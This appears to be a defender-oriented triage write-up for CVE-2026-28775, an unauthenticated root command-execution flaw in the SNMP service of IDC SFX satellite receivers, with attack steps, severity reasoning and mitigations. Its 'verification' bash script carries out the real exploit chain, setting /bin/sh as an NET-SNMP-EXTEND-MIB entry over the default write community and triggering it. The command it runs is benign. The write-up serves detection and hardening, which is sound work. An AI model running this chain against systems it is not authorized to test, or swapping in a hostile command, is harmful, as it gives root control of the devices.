CVE-2026-28775 · An unauthenticated Remote Code Execution (RCE) vulnerability exists in the SNMP service of International Datacasting Corporation (IDC) SFX S

01 · The Real Story

This is a loaded service port left in the maintenance closet, not a drive-by web bug

CVE-2026-28775 is an unauthenticated root RCE in the SNMP service on IDC SFX Series SuperFlex Satellite Receiver devices, notably the SFX2100 family. The flaw depends on two things lining up at once: the device exposes SNMP to the attacker, and the shipped private SNMP community still has read/write access, letting the attacker use NET-SNMP-EXTEND-MIB to define and run commands as root. Public writeups and downstream vuln records describe affected versions as IDC SFX Series / SFX2100 devices running vulnerable net-snmp versions prior to 5.8.

The vendor-style 9.8/10.0 label is technically defensible in a lab, because if the port is reachable the exploit path is brutally short and lands as root with no auth and no user clicks. In real enterprises, though, this is not Exchange or an edge VPN: it is a niche OT/broadcast appliance, usually on a management or facility network, and exploitation normally requires an attacker to already have network adjacency to UDP/161 on the box. That exposure friction drags the operational severity down from *drop-everything CRITICAL* to a very serious *HIGH*.

"Root RCE is real, but the blast radius is gated by SNMP reachability and an insecure default that many shops already fence off."

02 · The Attack Path

4 steps from start to impact.

STEP 01

Find a reachable SFX SNMP endpoint

The attacker needs UDP/161 reachability to the appliance management plane. In practice the weaponized tooling is ordinary snmpget/snmpwalk from Net-SNMP, not a fancy exploit kit, because the protocol surface is enough on its own.

Conditions required:

Target is an IDC SFX/SFX2100 receiver
SNMP service is enabled and reachable over the network
Attacker has path to the management interface or management VLAN

Where this breaks in practice:

These devices are often not internet-facing
Many enterprises ACL SNMP to NMS hosts only
OT/broadcast segments may be routed separately from user networks

Detection/coverage: External vuln scanners may miss product fingerprinting on UDP/161; exposure is better found from config reviews, NAC/CMDB, and internal UDP scans.

STEP 02

Abuse the default writable community

Using snmpset with the default private community, the attacker writes new NET-SNMP-EXTEND-MIB entries. The public exploit writeup shows this is enough to register /bin/sh and attacker-controlled arguments with the daemon.

Conditions required:

Default or otherwise known SNMP v1/v2c write community is accepted
Write access to SNMP MIB objects is allowed

Where this breaks in practice:

If the write community was changed, removed, or SNMPv3-only is enforced, the chain breaks
Some deployments keep SNMP read-only even when enabled

Detection/coverage: Look for SNMP SET operations, especially writes under NET-SNMP-EXTEND-MIB / nsExtend*; many environments have weak telemetry for this unless SNMP is explicitly logged.

STEP 03

Trigger command execution as root

The attacker then uses snmpbulkwalk/snmpwalk to read the newly created extend object, which causes command execution. Because snmpd runs as root on the affected device, output comes back from a root-context process.

Conditions required:

NET-SNMP-EXTEND-MIB support is present
SNMP daemon runs as root
Underlying net-snmp build remains vulnerable/pre-5.8

Where this breaks in practice:

If the extend module is disabled, the payload never runs
Even reachable SNMP services may not expose this MIB in hardened builds

Detection/coverage: NIDS can flag unusual SNMP OIDs under enterprise tree 1.3.6.1.4.1.8072.1.3; on-host evidence includes suspicious snmpd-spawned shells or commands.

STEP 04

Use root on a niche but sensitive appliance

Post-compromise, the attacker owns the receiver and can alter configuration, disrupt content delivery, pivot from the management segment, or use the box as a foothold into adjacent broadcast/OT infrastructure. This is high-value in the right environment even if the product population is small.

Conditions required:

Device has routable access to adjacent management or operations systems
Attacker can maintain access after initial command execution

Where this breaks in practice:

These appliances are often single-purpose and sparsely connected
Limited egress and flat Linux userland can constrain tooling compared with general-purpose servers

Detection/coverage: EDR is usually absent on embedded appliances, so network containment and config monitoring matter more than endpoint telemetry.

03 · Intelligence Metadata

The supporting signals.

In-the-wild status	No confirmed active exploitation found in reviewed authoritative sources, and not listed in CISA KEV as of the catalog page reviewed.
Proof-of-concept availability	Yes — public PoC-level tradecraft exists. Abdul Mhanni's disclosure includes working `snmpset` and `snmpbulkwalk` commands that create and trigger `nsExtend` entries; that is enough for reproduction without a separate exploit framework.
EPSS	0.00944 from the prompt intel. That is low relative likelihood for broad internet exploitation, which fits a niche appliance on a management plane; percentile not independently verified in the reviewed authoritative sources.
KEV status	No. CISA's Known Exploited Vulnerabilities catalog did not show this CVE in the reviewed source.
CVSS vector reality check	`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` correctly captures the technical impact: if reachable, it is unauthenticated root RCE with full compromise potential. It overstates enterprise-wide urgency because it ignores management-plane reachability and product population.
Affected versions	Reviewed records describe IDC SFX Series / SFX2100 SuperFlex Satellite Receiver devices as affected, with downstream references calling out builds using `net-snmp` prior to `5.8`.
Fixed version	Best available fix signal: `net-snmp 5.8+`. I did not find an IDC vendor firmware advisory in the reviewed sources that cleanly names a patched firmware release, so validate with the vendor before assuming a firmware train is available.
Scanning / exposure data	No trustworthy public population count found in the reviewed sources for exposed SFX devices. Treat this as a niche externally exposed population problem and a serious internal-management-segment problem; standard internet scanners can see SNMP, but reliable SFX fingerprinting counts were not validated here.
Disclosure date	2026-03-04 in NVD/OpenCVE records; the public blog writeup was published 2026-03-05.
Researcher / source	Abdul Mhanni published the technical disclosure; the CVE source/CNA shown in downstream records is Gridware.

04 · The Call

noisgate verdict.

Final Verdict

↓ DOWNGRADED to HIGH (8.4/10)

The decisive friction is attacker position: this bug is devastating only after an attacker can reach UDP/161 on a niche appliance's management plane. That means the real-world exposed population is much smaller than a web-edge RCE, but once reachable the chain is trivial and lands as root, which keeps it firmly in HIGH.

HIGH Technical impact if SNMP is reachable and writeable

MEDIUM Enterprise-wide severity downgrade based on likely management-plane isolation

LOW Public exposure/population estimates for this specific IDC product

Why this verdict

Downgraded for attacker position: exploitation requires network reachability to the SNMP management service, which in real deployments usually implies internal access, a routed management segment, or a badly exposed OT edge.
Still high because the exploit is short and clean: no credentials, no user interaction, and public reproduction steps already exist using standard Net-SNMP tooling.
Population is narrow, impact is not: this is a specialized appliance rather than a mass enterprise platform, but compromise lands as root on infrastructure that can be operationally sensitive.

Why not higher?

This is not an every-enterprise edge-service emergency. The vulnerability sits behind SNMP exposure assumptions that are often blocked by segmentation, ACLs, or simple lack of internet reachability, and there is no KEV listing or reviewed evidence of broad in-the-wild exploitation. Those are meaningful downward pressures.

Why not lower?

If an attacker can touch the service, there is almost no exploit friction left. Default writable community access plus NET-SNMP-EXTEND-MIB means unauthenticated command execution as root, which is too easy and too complete to relegate to MEDIUM.

05 · Compensating Control

What to do — in priority order.

Block UDP/161 to the appliance — Restrict SNMP to approved NMS sources only at firewalls, routers, and local ACLs. For a HIGH verdict, deploy this compensating control within 30 days; faster if the device is reachable from user, server, or third-party networks.
Disable SNMP write access — Remove or rotate the default private community, eliminate SNMP v1/v2c write communities, and prefer SNMPv3 where the product supports it. This cuts the exploit chain at the most decisive step and should be completed within 30 days.
Disable extend functionality or SNMP entirely — If the receiver does not require SNMP for operations, shut it off. If SNMP is required, disable NET-SNMP-EXTEND-MIB style command-extension capability where feasible; implement this within 30 days as a temporary or permanent hardening measure.
Constrain management-plane reachability — Move the device into a dedicated management or OT enclave with jump-host-only administration and explicit allowlists. For HIGH, this is a valid compensating control to stand up within 30 days while you verify patchability and vendor guidance.
Alert on SNMP SET activity — Instrument IDS, firewall logs, or SNMP daemon logs to detect snmpset behavior and especially writes under nsExtend* OIDs. Detection does not prevent exploitation, but it helps catch probing and repeat attempts while compensating controls are being rolled out within 30 days.

What doesn't work

MFA does not help because the exploit path is unauthenticated SNMP, not an interactive login flow.
Read-only monitoring confidence is misplaced if the private write community still exists; monitoring traffic can look normal right up until snmpset lands.
Generic antivirus on adjacent Windows admin stations does nothing to stop an attacker talking SNMP directly to the appliance.
Relying on low EPSS alone is a mistake; low broad-exploitation probability does not reduce impact on the specific reachable device.

06 · Verification

Crowdsourced verification payload.

Run this from an auditor workstation or management jump host that has network reachability to the target's UDP/161 port and the Net-SNMP client tools installed. Invoke it as ./check-cve-2026-28775.sh 10.10.20.15; no target credentials are needed because the check tests the default communities, but you do need permission to send SNMP probes from your source IP.

noisgate-verify.sh

BASHREAD-ONLYSAFE

#!/usr/bin/env bash
# check-cve-2026-28775.sh
# Safe-ish verification for CVE-2026-28775 on IDC SFX/SFX2100 targets.
# It checks whether default SNMP communities are accepted and whether
# NET-SNMP-EXTEND-MIB can be abused to execute a benign command.
#
# Output:
#   VULNERABLE - default write community works and extend MIB executes
#   PATCHED    - target responds but chain is blocked
#   UNKNOWN    - no response / tools missing / indeterminate
#
# Exit codes:
#   0 = VULNERABLE
#   1 = PATCHED
#   2 = UNKNOWN

set -u

TARGET="${1:-}"
RW_COMMUNITY="private"
RO_COMMUNITY="public"
TAG="ngcve28775"
MIB="NET-SNMP-EXTEND-MIB"
OID_BASE="nsExtendStatus.\"${TAG}\""
TMP_OUT="$(mktemp 2>/dev/null || echo /tmp/ngcve28775.$$)"

cleanup() {
  snmpset -v1 -c "$RW_COMMUNITY" "$TARGET" "$MIB::$OID_BASE" i 6 >/dev/null 2>&1 || true
  rm -f "$TMP_OUT" >/dev/null 2>&1 || true
}
trap cleanup EXIT

need_cmd() {
  command -v "$1" >/dev/null 2>&1
}

if [[ -z "$TARGET" ]]; then
  echo "UNKNOWN - usage: $0 <ip-or-hostname>"
  exit 2
fi

for cmd in snmpget snmpset snmpwalk timeout; do
  if ! need_cmd "$cmd"; then
    echo "UNKNOWN - missing required command: $cmd"
    exit 2
  fi
done

# Basic liveness check: if even the public community does not answer, try private.
if ! timeout 5 snmpget -v2c -c "$RO_COMMUNITY" -Oqv "$TARGET" SNMPv2-MIB::sysDescr.0 >"$TMP_OUT" 2>/dev/null; then
  if ! timeout 5 snmpget -v2c -c "$RW_COMMUNITY" -Oqv "$TARGET" SNMPv2-MIB::sysDescr.0 >"$TMP_OUT" 2>/dev/null; then
    echo "UNKNOWN - target did not respond to default SNMP communities"
    exit 2
  fi
fi

# Attempt to create a benign extend entry using the default write community.
if ! timeout 5 snmpset -m +"$MIB" -v1 -c "$RW_COMMUNITY" "$TARGET" \
  "$MIB::$OID_BASE" i 4 \
  "$MIB::nsExtendCommand.\"${TAG}\"" s /bin/sh \
  "$MIB::nsExtendArgs.\"${TAG}\"" s '-c "echo VULNTEST"' >"$TMP_OUT" 2>/dev/null; then
  echo "PATCHED - default write community or extend write path rejected"
  exit 1
fi

# Trigger execution by reading the extend subtree.
if timeout 5 snmpwalk -m +"$MIB" -v2c -c "$RO_COMMUNITY" "$TARGET" "$MIB::nsExtendObjects" >"$TMP_OUT" 2>/dev/null; then
  if grep -q 'VULNTEST' "$TMP_OUT"; then
    echo "VULNERABLE - default private write community plus extend MIB command execution confirmed"
    exit 0
  fi
fi

# Some targets may require reading back with the same write community.
if timeout 5 snmpwalk -m +"$MIB" -v2c -c "$RW_COMMUNITY" "$TARGET" "$MIB::nsExtendObjects" >"$TMP_OUT" 2>/dev/null; then
  if grep -q 'VULNTEST' "$TMP_OUT"; then
    echo "VULNERABLE - default private write community plus extend MIB command execution confirmed"
    exit 0
  fi
fi

echo "PATCHED - target responded, but benign extend execution was not confirmed"
exit 1

07 · Bottom Line

If you remember one thing.

TL;DR

Monday morning, treat this as a management-plane root RCE and pull an exposure list of every IDC SFX/SFX2100 receiver plus every path that can reach UDP/161. Because this is HIGH, apply network and SNMP hardening under the noisgate mitigation SLA within 30 days — specifically block SNMP from anything except approved NMS sources, remove the default write community, and disable SNMP entirely where it is not needed. Then complete vendor remediation or validated component upgrade under the noisgate remediation SLA within 180 days; if IDC has no confirmed firmware fix yet, keep the compensating controls in place and track the device as an exception until a real patch path is available.

Sources

Peer Review

What defenders are saying.

Submit a review attribution: handle + country only

0 flags selected · stored anonymously

Validation Results

Crowdsourced verification outputs.

Results submitted by users who ran the verification payload against their environment.